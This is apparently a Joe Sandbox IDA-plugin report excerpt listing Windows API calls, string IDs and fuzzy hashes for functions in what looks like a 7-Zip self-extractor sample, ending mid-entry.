                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$??3@
                                                                                • String ID: 100%%
                                                                                • API String ID: 2562992111-568723177
                                                                                • Opcode ID: 12f67b010b6c6ce84eccff202d1a0e8d3bcac39d66bf8899ef5ab7ef9dd2aa27
                                                                                • Instruction ID: 3e0dd225468330a220e365205065e92fc94ece49804654ab909baed5dde81f9a
                                                                                • Opcode Fuzzy Hash: 12f67b010b6c6ce84eccff202d1a0e8d3bcac39d66bf8899ef5ab7ef9dd2aa27
                                                                                • Instruction Fuzzy Hash: 8C31B471A007059FDB24EFAAD9459AEB7F4EF10708B00452ED582A22E1DB78FD44CB99
                                                                                APIs
                                                                                  • Part of subcall function 004076D3: KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407715
                                                                                  • Part of subcall function 004076D3: GetSystemMetrics.USER32(00000011), ref: 00407723
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • wsprintfW.USER32 ref: 00405E48
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041BBE4,?), ref: 00405E85
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$??3@CallbackDispatcherMetricsSystemUserwsprintf
                                                                                • String ID: %X - %03X - %03X - %03X - %03X$Volumes
                                                                                • API String ID: 2991351368-1890733987
                                                                                • Opcode ID: fe1d066e480cc0a8df7484f04aff36523d42970a70a16410e725cc97b66a1737
                                                                                • Instruction ID: ab41b2b7a044f4dbafe54773f7122e0ca5258214a4a67c8b0ba5fddcbcc6d2b4
                                                                                • Opcode Fuzzy Hash: fe1d066e480cc0a8df7484f04aff36523d42970a70a16410e725cc97b66a1737
                                                                                • Instruction Fuzzy Hash: 5821A131D44618AACB15AB91EC16EEEB774EF40704F00417FB516361E6EBB86A84CBC8
                                                                                APIs
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00408721
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040873E
                                                                                • SHGetMalloc.SHELL32(00000000), ref: 00408768
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                  • Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086BB
                                                                                  • Part of subcall function 004086A5: SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
                                                                                  • Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086CE
                                                                                  • Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086E3
                                                                                  • Part of subcall function 004086A5: SendMessageW.USER32(00000000,000000B1,00000089,00000089), ref: 004086ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Item$??2@??3@BrowseFocusFolderFromListMallocMessagePathSendmemcpy
                                                                                • String ID: A
                                                                                • API String ID: 593732027-3554254475
                                                                                • Opcode ID: 3aef01d46d1d784e5e29d610c3657d02adb904ff4126155760b37b46b3dd5f1b
                                                                                • Instruction ID: f71166d28af5d16d10e8ce64d0ac3497a8bafdc94a68efcedc6b2873967d7f2a
                                                                                • Opcode Fuzzy Hash: 3aef01d46d1d784e5e29d610c3657d02adb904ff4126155760b37b46b3dd5f1b
                                                                                • Instruction Fuzzy Hash: 1E1124756101089BDB10DBA5D958BEE77FCAF44700F1440AEE505E7240EF79DE04CB65
                                                                                APIs
                                                                                  • Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
                                                                                  • Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
                                                                                  • Part of subcall function 0040439D: wsprintfW.USER32 ref: 00404400
                                                                                  • Part of subcall function 0040439D: GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 004074B9
                                                                                  • Part of subcall function 00404772: lstrlenW.KERNEL32(?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404781
                                                                                  • Part of subcall function 00404772: GetSystemTimeAsFileTime.KERNEL32(00402DFC,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047ED
                                                                                  • Part of subcall function 00404772: GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047F4
                                                                                  • Part of subcall function 00404772: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C), ref: 004048A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@File$AttributesPathTempTime$??2@Systemlstrlenmemcpywsprintf
                                                                                • String ID: 7ZipSfx.%03x$PreExtract$SfxVarApiPath
                                                                                • API String ID: 1986220984-914423340
                                                                                • Opcode ID: 4902d0ce1074e967584ec60d0a38107b3532f148ed6ce06a9c2170e3f9388bcb
                                                                                • Instruction ID: 2ce7c900065db82cd6f53f7d938477cc4679eae404a7dae147fc4add6962fe21
                                                                                • Opcode Fuzzy Hash: 4902d0ce1074e967584ec60d0a38107b3532f148ed6ce06a9c2170e3f9388bcb
                                                                                • Instruction Fuzzy Hash: 65F0D670A0810063C704B765D952AEEB7555F81308B10823FE926325E2EF3CA985C6CF
                                                                                APIs
                                                                                  • Part of subcall function 00411BBA: memcpy.MSVCRT(00000000,00000000,?,?,?,00000000,004025B9,?,?,0041E788,0040297D,00000000,?,0040508D,?,?), ref: 00411BD6
                                                                                • wsprintfW.USER32 ref: 00408463
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                • GetDlgItem.USER32(?,?), ref: 00408485
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00408496
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$??3@Itemwsprintf
                                                                                • String ID: (%d%s)
                                                                                • API String ID: 1424909225-2087557067
                                                                                • Opcode ID: 50f8f7e77dcdce2d2851faa96b4847d1a382eb25ef94aa29150f29fce31bd72e
                                                                                • Instruction ID: 9e5063b97f59bed1c8fd24a2ad4692a97a2054891322a5ccd9956e41115b1732
                                                                                • Opcode Fuzzy Hash: 50f8f7e77dcdce2d2851faa96b4847d1a382eb25ef94aa29150f29fce31bd72e
                                                                                • Instruction Fuzzy Hash: 61F0CD71800218BFCB21B755DC05EDE77BCDF04304F10856BF512A11A1DB75AA548F98
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 00404768
                                                                                  • Part of subcall function 0040442E: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,004046CD,00000000,00000000,?,74DF1D70,00000000), ref: 0040445A
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046D9
                                                                                  • Part of subcall function 00411CE3: memcpy.MSVCRT(?,?,?,00000000,?,?,004046EB,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 00411D06
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046F5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@memcpy$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1626065140-0
                                                                                • Opcode ID: 93f7aad1806c94775ca1a0d8f3ad7751ed0721520a76da4e217b367523b252c3
                                                                                • Instruction ID: 1758fece63184e570d04f9e3611b3a9f4be235bc0ae71469d74a11a45544da14
                                                                                • Opcode Fuzzy Hash: 93f7aad1806c94775ca1a0d8f3ad7751ed0721520a76da4e217b367523b252c3
                                                                                • Instruction Fuzzy Hash: 123175B3D001199BDB15EBD5CD929EEB7B9AE51315B10003FE902731D1EF386E44D668
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 0040792E
                                                                                • GetSystemMetrics.USER32(00000031), ref: 00407955
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00407964
                                                                                • DeleteObject.GDI32(00000000), ref: 00407993
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                • String ID:
                                                                                • API String ID: 1900162674-0
                                                                                • Opcode ID: 3aa07e0a7f1af689ece96d308e0d97d5d4d1cf2e54ab12650ba7b2974e37ea09
                                                                                • Instruction ID: 552ae8ed6ee0fcd442ad2df4779f82c6782e58800ccef47fbdddea08636dacf5
                                                                                • Opcode Fuzzy Hash: 3aa07e0a7f1af689ece96d308e0d97d5d4d1cf2e54ab12650ba7b2974e37ea09
                                                                                • Instruction Fuzzy Hash: 471163B5A00209AFEB10DF54DC88FEAB7B8EB08304F04806AED15A7291DB74ED44CF55
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0040C1F6,?,?,?,?,00000000,0040C27F,?,?,?,?,0040C2BF), ref: 0040C0DC
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0040C1F6,?,?,?,?,00000000,0040C27F,?,?,?,?,0040C2BF), ref: 0040C0E2
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000040,00000000,00000000,0040C1F6,?,?,?,?,00000000,0040C27F,?,?,?,?,0040C2BF), ref: 0040C0EF
                                                                                • memmove.MSVCRT(-00000004,00000000,00000000), ref: 0040C125
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@memmove
                                                                                • String ID:
                                                                                • API String ID: 1826340609-0
                                                                                • Opcode ID: 7d6504357a63624ebbf63e7d2564780171e3895f61a9aa19c6a6dbcff992711a
                                                                                • Instruction ID: d72a3ecf45b14767aacc25f0edad6bbd2b7de6c552061b2cfde35ae26a62c5f5
                                                                                • Opcode Fuzzy Hash: 7d6504357a63624ebbf63e7d2564780171e3895f61a9aa19c6a6dbcff992711a
                                                                                • Instruction Fuzzy Hash: 67019E76600601ABD210AB59D8859A773F6EBC4314708893EE85BD7741DB38E892CB68
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
                                                                                  • Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C
                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,?), ref: 00404585
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040458E
                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 004045A6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004045BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@wcsncpy
                                                                                • String ID:
                                                                                • API String ID: 3034541985-0
                                                                                • Opcode ID: e0fe7b5910432ef50a0a8318928bacb5c4c5a05a3a776a5bbc470781a438ae21
                                                                                • Instruction ID: 2e5778dcc9210aa7dd5b0ff30e3ff33adc1733fc5fdfc97d9385700bbc9d95d0
                                                                                • Opcode Fuzzy Hash: e0fe7b5910432ef50a0a8318928bacb5c4c5a05a3a776a5bbc470781a438ae21
                                                                                • Instruction Fuzzy Hash: E6F086B29001047ED714B755EC52DEE737CDF80704B10027EFA12B2195EF756E45C668
                                                                                APIs
                                                                                • ScreenToClient.USER32(?,?), ref: 00408E04
                                                                                • GetClientRect.USER32(?,?), ref: 00408E16
                                                                                • PtInRect.USER32(?,?,?), ref: 00408E25
                                                                                  • Part of subcall function 00408557: KillTimer.USER32(?,00000001,?,00408E3A), ref: 00408565
                                                                                • CallNextHookEx.USER32(?,?,?), ref: 00408E47
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                                • String ID:
                                                                                • API String ID: 3015594791-0
                                                                                • Opcode ID: 5d011e402e72c6a9b9df993ad098a0545963fe571f3a7749bf0a2aad1169c23d
                                                                                • Instruction ID: 8fcd255104d3cefc2dd881faf99252f3ba0547ec7e41450095debebf42560e69
                                                                                • Opcode Fuzzy Hash: 5d011e402e72c6a9b9df993ad098a0545963fe571f3a7749bf0a2aad1169c23d
                                                                                • Instruction Fuzzy Hash: 80015B35100115EBDB11AF55DE09EAA7BA6FB04304B08843AE956E32A1EB34E851DB99
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,?,004119DE,?,00411CC1,00000000,?,?,00000000,004050A9,?,0041ADC8,?), ref: 004118D4
                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,00000000,?,004119DE,?,00411CC1,00000000,?,?,00000000,004050A9), ref: 004118E6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,00000000,?,00000000,?,004119DE,?,00411CC1,00000000,?,?,00000000), ref: 004118ED
                                                                                • _CxxThrowException.MSVCRT(00000000,0041C9D4), ref: 00411911
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3462485524-0
                                                                                • Opcode ID: 59522b9d663a006d42a11aac5f69606e4972673f07fc2ef7bcdb3eae39c19829
                                                                                • Instruction ID: 5ee8940816b856f5d356b0442bc385a37373ddd71d54f703b79fddb5c0f671e4
